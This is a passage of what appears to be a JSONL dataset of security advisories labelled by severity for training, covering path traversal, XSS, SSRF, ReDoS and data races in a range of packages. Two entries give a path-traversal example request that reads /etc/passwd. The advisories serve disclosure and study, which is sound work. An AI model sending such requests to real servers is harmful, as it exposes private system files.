transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "ff49efcd136b18582061", "text": "Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities", "text_raw": "Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2016-07-19", "split": "train"} -{"id": "899ee67ba40d9a9e5965", "text": "rest-client allows local users to obtain sensitive information by reading the log\n\nREST client for Ruby (aka rest-client) before 1.7.3 logs usernames and passwords, which allows local users to obtain sensitive information by reading the log.", "text_raw": "rest-client allows local users to obtain sensitive information by reading the log\n\n[Severity: LOW]\n\nREST client for Ruby (aka rest-client) before 1.7.3 logs usernames and passwords, which allows local users to obtain sensitive information by reading the log.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "e1e6f0aa24c4d9c7cbe8", "text": "Path Traversal in zero\n\nVersions of `zero` prior to 1.0.6 are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files.\n\n## Recommendation\n\nUpgrade to version 1.0.6 or later.", "text_raw": "Path Traversal in zero\n\n[Severity: HIGH]\n\nVersions of `zero` prior to 1.0.6 are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files. \n\n\n## Recommendation\n\nUpgrade to version 1.0.6 or later.\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "ee6b93dc7802130da683", "text": "OpenSSL gem for Ruby using inadequate encryption strength\n\nThe OpenSSL gem for Ruby uses the same initialization vector (IV) in GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for context-dependent attackers to bypass the encryption protection mechanism.", "text_raw": "OpenSSL gem for Ruby using inadequate encryption strength\n\n[Severity: HIGH]\n\nThe OpenSSL gem for Ruby uses the same initialization vector (IV) in GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for context-dependent attackers to bypass the encryption protection mechanism.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "a5690d325b6efd1f3487", "text": "Withdrawn: ESLint dependencies are vulnerable (ReDoS and Prototype Pollution)\n\n**Withdrawn**\nGitHub has withdrawn this advisory in place of GHSA-vh95-rmgr-6w4m and GHSA-6chw-6frg-f759.\nThe reason for withdrawing is that some mistakes were made during the ingestion of CVE-2020-7598\nwhich caused this advisory to be published with incorrect information.\n\nIn order to provide accurate advisory information, new advisories were created:\n\n- minimist: https://github.com/advisories/GHSA-vh95-rmgr-6w4m\n- acorn: https://github.com/advisories/GHSA-6chw-6frg-f759", "text_raw": "Withdrawn: ESLint dependencies are vulnerable (ReDoS and Prototype Pollution)\n\n[Severity: MEDIUM]\n\n**Withdrawn**\nGitHub has withdrawn this advisory in place of GHSA-vh95-rmgr-6w4m and GHSA-6chw-6frg-f759.\nThe reason for withdrawing is that some mistakes were made during the ingestion of CVE-2020-7598\nwhich caused this advisory to be published with incorrect information.\n\nIn order to provide accurate advisory information, new advisories were created:\n\n- minimist: https://github.com/advisories/GHSA-vh95-rmgr-6w4m\n- acorn: https://github.com/advisories/GHSA-6chw-6frg-f759", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-03-13", "split": "train"} -{"id": "443175c6b81eaa51cdb2", "text": "In Bouncy Castle JCE Provider the other party DH public key is not fully validated\n\nIn the Bouncy Castle JCE Provider version 1.55 and earlier the other party DH public key is not fully validated. This can cause issues as invalid keys can be used to reveal details about the other party's private key where static Diffie-Hellman is in use. As of release 1.56 the key parameters are checked on agreement calculation.", "text_raw": "In Bouncy Castle JCE Provider the other party DH public key is not fully validated\n\n[Severity: LOW]\n\nIn the Bouncy Castle JCE Provider version 1.55 and earlier the other party DH public key is not fully validated. This can cause issues as invalid keys can be used to reveal details about the other party's private key where static Diffie-Hellman is in use. As of release 1.56 the key parameters are checked on agreement calculation.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "3a43c9653d1645bffb9b", "text": "Path Traversal in 626\n\nAll versions of `626` are vulnerable to path traversal. This enables a remote attacker to read arbitrary files from the remote server using this module.\n\n## Recommendation\n\nNo fix is currently available for this vulnerability.\nIt is our recommendation to not install or use this module at this time.", "text_raw": "Path Traversal in 626\n\n[Severity: HIGH]\n\nAll versions of `626` are vulnerable to path traversal. This enables a remote attacker to read arbitrary files from the remote server using this module.\n\n\n## Recommendation\n\nNo fix is currently available for this vulnerability.\nIt is our recommendation to not install or use this module at this time.\n ", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "d12c29a3d4d61831d376", "text": "Server-Side Request Forgery in snipe/snipe-it\n\nAdmin users on the external network can perform blind POST-based SSRF (issue requests on behalf of the server into the internal network) via the Slack Integration. This vulnerability is capable of port-scanning of the internal network, issue POST requests to web servers on the internal network which can be escalated to higher-impact.", "text_raw": "Server-Side Request Forgery in snipe/snipe-it\n\n[Severity: HIGH]\n\nAdmin users on the external network can perform blind POST-based SSRF (issue requests on behalf of the server into the internal network) via the Slack Integration. This vulnerability is capable of port-scanning of the internal network, issue POST requests to web servers on the internal network which can be escalated to higher-impact.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-10", "split": "train"} -{"id": "86e79d13c0557d1b46fe", "text": "Data races in v9\n\nAffected versions of this crate unconditionally implement `Sync` for `SyncRef`. This definition allows data races if `&T` is accessible through `&SyncRef`.\n\n`SyncRef` derives `Clone` and `Debug`, and the default implementations of those traits access `&T` by invoking `T::clone()` & `T::fmt()`. It is possible to create data races & undefined behavior by concurrently invoking `SyncRef::clone()` or `SyncRef::fmt()` from multiple threads with `T: !Sync`.", "text_raw": "Data races in v9\n\n[Severity: HIGH]\n\nAffected versions of this crate unconditionally implement `Sync` for `SyncRef`. This definition allows data races if `&T` is accessible through `&SyncRef`.\n\n`SyncRef` derives `Clone` and `Debug`, and the default implementations of those traits access `&T` by invoking `T::clone()` & `T::fmt()`. It is possible to create data races & undefined behavior by concurrently invoking `SyncRef::clone()` or `SyncRef::fmt()` from multiple threads with `T: !Sync`.\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "539f264e39dc12a8800f", "text": "Cross site scripting via HTML attributes in the back end\n\n### Impact\n\nIt is possible for untrusted users to inject malicious code into HTML attributes in the back end, which will be executed both in the element preview (back end) and on the website (front end).\n\nInstallations are only affected if there are untrusted back end users who have the rights to modify HTML fields (e.g. TinyMCE).\n\n### Patches\n\nUpdate to Contao 4.4.56, 4.9.18 or 4.11.7\n\n### Workarounds\n\nDisable all fields that allow HTML for untrusted back end users or disable the login for these users.\n\n### References\n\nhttps://contao.org/en/security-advisories/cross-site-scripting-via-html-attributes-in-the-back-end\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).\n\n### Credits\n\nThanks to Mikhail Khramenkov and Moritz Vondano for reporting this security issue.", "text_raw": "Cross site scripting via HTML attributes in the back end\n\n[Severity: MEDIUM]\n\n### Impact\n\nIt is possible for untrusted users to inject malicious code into HTML attributes in the back end, which will be executed both in the element preview (back end) and on the website (front end).\n\nInstallations are only affected if there are untrusted back end users who have the rights to modify HTML fields (e.g. TinyMCE).\n\n### Patches\n\nUpdate to Contao 4.4.56, 4.9.18 or 4.11.7\n\n### Workarounds\n\nDisable all fields that allow HTML for untrusted back end users or disable the login for these users.\n\n### References\n\nhttps://contao.org/en/security-advisories/cross-site-scripting-via-html-attributes-in-the-back-end\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).\n\n### Credits\n\nThanks to Mikhail Khramenkov and Moritz Vondano for reporting this security issue.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "9fc64811be7d4c9d0728", "text": "Directory Traversal in censorify.tanisjr\n\nAffected versions of `censorify.tanisjr` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in censorify.tanisjr\n\n[Severity: HIGH]\n\nAffected versions of `censorify.tanisjr` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "01c48e6cfe8711c4508f", "text": "Directory Traversal in peiserver\n\nAffected versions of `peiserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in peiserver\n\n[Severity: HIGH]\n\nAffected versions of `peiserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "8f1ab57e670d9f8fae53", "text": "Sounder Contains Arbitrary Command Execution Vulnerability\n\nlib/sounder/sound.rb in the sounder gem 1.0.1 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a filename.", "text_raw": "Sounder Contains Arbitrary Command Execution Vulnerability\n\n[Severity: HIGH]\n\nlib/sounder/sound.rb in the sounder gem 1.0.1 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a filename.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "3b824e5966a259623bae", "text": "Microsoft Defender Remote Code Execution Vulnerability\n\nAffected: Microsoft Defender\n\nMicrosoft Defender contains an unspecified vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122, CWE-1285\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Defender Remote Code Execution Vulnerability\n\nAffected: Microsoft Defender\n\nMicrosoft Defender contains an unspecified vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122, CWE-1285\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "3a4048032bd672ad71d2", "text": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Wicket\n\nBy crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering. Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Wicket\n\n[Severity: HIGH]\n\nBy crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering. Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-07", "split": "train"} -{"id": "448962ef2c6c685b6c31", "text": "Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure", "text_raw": "Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2017-05-03", "split": "train"} -{"id": "17879d447b6a007f89ab", "text": "Server-Side Request Forgery in Hawt Hawtio\n\nHawt Hawtio through 2.5.0 is vulnerable to SSRF, allowing a remote attacker to trigger an HTTP request from an affected server to an arbitrary host via the initial /proxy/ substring of a URI.", "text_raw": "Server-Side Request Forgery in Hawt Hawtio\n\n[Severity: CRITICAL]\n\nHawt Hawtio through 2.5.0 is vulnerable to SSRF, allowing a remote attacker to trigger an HTTP request from an affected server to an arbitrary host via the initial /proxy/ substring of a URI.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-07-05", "split": "train"} -{"id": "6f8912e6f5871c6d0711", "text": "personnummer/python vulnerable to Improper Input Validation\n\nThis vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.\n\n### Impact\n\nThis vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.\n\n### Patches\n\nThe issue have been patched in all repositories. The following versions should be updated to as soon as possible:\n\n[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2 \nD 3.0.1 \n[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3 \nElixir 3.0.0 \n[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1 \n[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0 \n[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0 \nKotlin 1.1.0 \nLua 3.0.1 \n[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2 \nPerl 3.0.0 \n[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2 \n[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1 \n[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0 \nScala 3.0.1 \nSwift 1.0.1\n\nIf you are using any of the earlier packages, please update to latest.\n\n### Workarounds\n\nThe issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be\n000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not\n000x.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)\n* Email us at [Personnummer Email](mailto:security@personnummer.dev)", "text_raw": "personnummer/python vulnerable to Improper Input Validation\n\n[Severity: LOW]\n\nThis vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.\n\nThe vulnerability is determined to be low severity.\n\n### Impact\n\nThis vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer. \n\n### Patches\n\nThe issue have been patched in all repositories. The following versions should be updated to as soon as possible:\n\n[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2 \nD 3.0.1 \n[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3 \nElixir 3.0.0 \n[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1 \n[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0 \n[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0 \nKotlin 1.1.0 \nLua 3.0.1 \n[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2 \nPerl 3.0.0 \n[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2 \n[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1 \n[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0 \nScala 3.0.1 \nSwift 1.0.1 \n\nIf you are using any of the earlier packages, please update to latest.\n\n### Workarounds\n\nThe issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be\n000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not\n000x.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)\n* Email us at [Personnummer Email](mailto:security@personnummer.dev)", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-09-09", "split": "train"} -{"id": "3beed0022d4a569cfd40", "text": "Denial of Service in OpenCV\n\nOpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a denial of service (memory consumption) issue, as demonstrated by the 10-opencv-dos-memory-exhaust test case.", "text_raw": "Denial of Service in OpenCV\n\n[Severity: HIGH]\n\nOpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a denial of service (memory consumption) issue, as demonstrated by the 10-opencv-dos-memory-exhaust test case.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "fae3d861811a8ef0f49b", "text": "ReDoS vulnerability in parser_apache2\n\n### Impact\nparser_apache2 plugin in Fluentd v0.14.14 to v1.14.1 suffers from a regular expression denial of service (ReDoS) vulnerability. A broken apache log with a certain pattern of string can spend too much time in a regular expression, resulting in the potential for a DoS attack.\n\n### Patches\nv1.14.2\n\n### Workarounds\nEither of the following:\n\n* Don't use parser_apache2 for parsing logs which cannot guarantee generated by Apache.\n* Put patched version of parser_apache2.rb into /etc/fluent/plugin directory (or any other directories specified by the environment variable `FLUENT_PLUGIN` or `--plugin` option of fluentd).\n\n### References\n* [CVE-2021-41186](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41186)\n* [GHSA-hwhf-64mh-r662](https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662)\n* [GHSL-2021-102](https://securitylab.github.com/advisories/GHSL-2021-102-fluent-fluentd/)\n* https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142", "text_raw": "ReDoS vulnerability in parser_apache2\n\n[Severity: MEDIUM]\n\n### Impact\nparser_apache2 plugin in Fluentd v0.14.14 to v1.14.1 suffers from a regular expression denial of service (ReDoS) vulnerability. A broken apache log with a certain pattern of string can spend too much time in a regular expression, resulting in the potential for a DoS attack.\n\n### Patches\nv1.14.2\n\n### Workarounds\nEither of the following:\n\n* Don't use parser_apache2 for parsing logs which cannot guarantee generated by Apache.\n* Put patched version of parser_apache2.rb into /etc/fluent/plugin directory (or any other directories specified by the environment variable `FLUENT_PLUGIN` or `--plugin` option of fluentd).\n\n### References\n* [CVE-2021-41186](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41186)\n* [GHSA-hwhf-64mh-r662](https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662)\n* [GHSL-2021-102](https://securitylab.github.com/advisories/GHSL-2021-102-fluent-fluentd/)\n* https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-01", "split": "train"} -{"id": "fc7d76a58b0c06386969", "text": "Apache CXF Fediz application plugins are vulnerable to Denial of Service (DoS) attacks\n\nApplication plugins in Apache CXF Fediz prior to version 1.1.3 and 1.2.x prior to 1.2.1 allow remote attackers to create a denial of service.", "text_raw": "Apache CXF Fediz application plugins are vulnerable to Denial of Service (DoS) attacks\n\n[Severity: HIGH]\n\nApplication plugins in Apache CXF Fediz prior to version 1.1.3 and 1.2.x prior to 1.2.1 allow remote attackers to create a denial of service.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-18", "split": "train"} -{"id": "e6771c46043d65c6a737", "text": "botframework-connector vulnerable to Improper Authentication\n\n### Impact\nA maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an attacker to have internal knowledge of the bot.\n\n### Patches\nThe problem has been patched in all affected versions. Please see the list of patched versions for the most appropriate one for your individual case.\n\n### Workarounds\nUsers who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator, which throws an exception if the Claims are Skill Claims.\n\nFor detailed instructions, see the link in the References section.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botbuilder-dotnet)\n* Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com)", "text_raw": "botframework-connector vulnerable to Improper Authentication\n\n[Severity: MEDIUM]\n\n### Impact\nA maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an attacker to have internal knowledge of the bot.\n\n### Patches\nThe problem has been patched in all affected versions. Please see the list of patched versions for the most appropriate one for your individual case.\n\n### Workarounds\nUsers who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator, which throws an exception if the Claims are Skill Claims.\n\nFor detailed instructions, see the link in the References section.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botbuilder-dotnet)\n* Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-08", "split": "train"} -{"id": "ef46c5f95d181f1b84b3", "text": "ember-source Cross-site Scripting vulnerability\n\nCross-site scripting (XSS) vulnerability in Ember.js 1.8.x through 1.10.x, 1.11.x before 1.11.4, 1.12.x before 1.12.2, 1.13.x before 1.13.12, 2.0.x before 2.0.3, 2.1.x before 2.1.2, and 2.2.x before 2.2.1 allows remote attackers to inject arbitrary web script or HTML.", "text_raw": "ember-source Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in Ember.js 1.8.x through 1.10.x, 1.11.x before 1.11.4, 1.12.x before 1.12.2, 1.13.x before 1.13.12, 2.0.x before 2.0.3, 2.1.x before 2.1.2, and 2.2.x before 2.2.1 allows remote attackers to inject arbitrary web script or HTML.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-08-28", "split": "train"} -{"id": "39c7e0b31eb8d974db52", "text": "django-helpdesk is vulnerable to Cross-site Scripting\n\ndjango-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').", "text_raw": "django-helpdesk is vulnerable to Cross-site Scripting\n\n[Severity: HIGH]\n\ndjango-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-03", "split": "train"} -{"id": "bafb014ce9bdcb6074cb", "text": "Authenticated server-side request forgery in file upload via URL.\n\n### Impact\nAuthenticated server-side request forgery in file upload via URL.\n\n### Patches\nWe recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview.\n\nhttps://www.shopware.com/en/download/#shopware-6\n\n### Workarounds\nFor older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.", "text_raw": "Authenticated server-side request forgery in file upload via URL.\n\n[Severity: HIGH]\n\n### Impact\nAuthenticated server-side request forgery in file upload via URL.\n\n### Patches\nWe recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview.\n\nhttps://www.shopware.com/en/download/#shopware-6\n\n### Workarounds\nFor older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-23", "split": "train"} -{"id": "b9c671ddaa64b7a8eb31", "text": "Vulnerability in remove function leads to arbitrary code execution via filePath parameters\n\nAaptjs is a node wraper for aapt. An issue was discovered in the remove function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.", "text_raw": "Vulnerability in remove function leads to arbitrary code execution via filePath parameters\n\n[Severity: CRITICAL]\n\nAaptjs is a node wraper for aapt. An issue was discovered in the remove function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-11-02", "split": "train"} -{"id": "a8a9716140bdf9e6bace", "text": "Data races in convec\n\nAffected versions of this crate unconditionally implement Send/Sync for `ConVec`.\nThis allows users to insert `T` that is not Send or not Sync.\n\nThis allows users to create data races by using non-Send types like `Arc>` or `Rc<_>` as `T` in `ConVec`. It is also possible to create data races by using types like `Cell<_>` or `RefCell<_>` as `T` (types that are `Send` but not `Sync`).\nSuch data races can lead to memory corruption.", "text_raw": "Data races in convec\n\n[Severity: HIGH]\n\nAffected versions of this crate unconditionally implement Send/Sync for `ConVec`.\nThis allows users to insert `T` that is not Send or not Sync.\n\nThis allows users to create data races by using non-Send types like `Arc>` or `Rc<_>` as `T` in `ConVec`. It is also possible to create data races by using types like `Cell<_>` or `RefCell<_>` as `T` (types that are `Send` but not `Sync`).\nSuch data races can lead to memory corruption.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "c673fa2fadc72c924127", "text": "Timing attack on HMAC signature comparison in Apache Tapestry\n\nThe code which checks HMAC in form submissions used String.equals() for comparisons, which results in a timing side channel for the comparison of the HMAC signatures. This could lead to remote code execution if an attacker is able to determine the correct signature for their payload. The comparison should be done with a constant time algorithm instead.", "text_raw": "Timing attack on HMAC signature comparison in Apache Tapestry\n\n[Severity: CRITICAL]\n\nThe code which checks HMAC in form submissions used String.equals() for comparisons, which results in a timing side channel for the comparison of the HMAC signatures. This could lead to remote code execution if an attacker is able to determine the correct signature for their payload. The comparison should be done with a constant time algorithm instead.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-09-26", "split": "train"} -{"id": "6444915fdb7aa03dac02", "text": "October CMS vulnerable to Potential Host Header Poisoning on misconfigured servers\n\n### Impact\nWhen running on servers that are configured to accept a wildcard as a hostname (i.e. the server routes any request, regardless of the HOST header to an October CMS instance) the potential exists for Host Header Poisoning attacks to succeed. See the following resources for more information on Host Header Poisoning:\n- https://portswigger.net/web-security/host-header\n- https://dzone.com/articles/what-is-a-host-header-attack\n\n### Patches\n\nA feature has been added in v1.1.2 to allow a set of trusted hosts to be specified in the application.\n\n### Workarounds\n\n- Apply https://github.com/octobercms/library/commit/f86fcbcd066d6f8b939e8fe897409d152b11c3c6 & https://github.com/octobercms/october/commit/f638d3f78cfe91d7f6658820f9d5e424306a3db0 to your installation manually if unable to upgrade to v1.1.2.\n\n- Check that the configuration setting `cms.linkPolicy` is set to `force`.\n\n### Alternative Workaround\n\nCheck to make sure that your web server does not accept any hostname when serving your web application.\n\n1. Add an entry called `testing.tld` to your computer's host file and direct it to your server's IP address\n2. Open the address `testing.tld` in your web browser\n3. Make sure an October CMS website is not available at this address\n\nIf an October CMS website is returned, configure your webserver to only allow known hostnames. If you require assistance with this, please contact your server administrator.\n\n### References\n\nReported by [Abdullah Hussam](https://github.com/ahussam)\n\n### For More Information\n\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n\n### Threat Assessment\n\"Screen", "text_raw": "October CMS vulnerable to Potential Host Header Poisoning on misconfigured servers\n\n[Severity: LOW]\n\n### Impact\nWhen running on servers that are configured to accept a wildcard as a hostname (i.e. the server routes any request, regardless of the HOST header to an October CMS instance) the potential exists for Host Header Poisoning attacks to succeed. See the following resources for more information on Host Header Poisoning:\n- https://portswigger.net/web-security/host-header\n- https://dzone.com/articles/what-is-a-host-header-attack\n\n### Patches\n\nA feature has been added in v1.1.2 to allow a set of trusted hosts to be specified in the application.\n\n### Workarounds\n\n- Apply https://github.com/octobercms/library/commit/f86fcbcd066d6f8b939e8fe897409d152b11c3c6 & https://github.com/octobercms/october/commit/f638d3f78cfe91d7f6658820f9d5e424306a3db0 to your installation manually if unable to upgrade to v1.1.2.\n\n- Check that the configuration setting `cms.linkPolicy` is set to `force`.\n\n### Alternative Workaround\n\nCheck to make sure that your web server does not accept any hostname when serving your web application.\n\n1. Add an entry called `testing.tld` to your computer's host file and direct it to your server's IP address\n2. Open the address `testing.tld` in your web browser\n3. Make sure an October CMS website is not available at this address\n\nIf an October CMS website is returned, configure your webserver to only allow known hostnames. If you require assistance with this, please contact your server administrator.\n\n### References\n\nReported by [Abdullah Hussam](https://github.com/ahussam)\n\n### For More Information\n\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n\n### Threat Assessment\n\"Screen", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-03-10", "split": "train"} -{"id": "ba6d46b14fa5e996f6a0", "text": "Improper Control of Generation of Code ('Code Injection') in @asyncapi/modelina\n\n### Impact\nAnyone who is using the default presets and/or does not handle the functionality themself.\n\n### Patches\nIt is impossible to fully guard against this, because users have access to the original raw information. However, as of version 1, if you only access the constrained models, you will not encounter this issue.\n\nFurther similar situations are NOT seen as a security issue, but intended behavior.\n\n### Workarounds\nFully custom presets that change the entire rendering process which can then escape the user input.\n\n### For more information\nEven though that I changed all the presets here, the vulnerability is still present throughout. I am using a 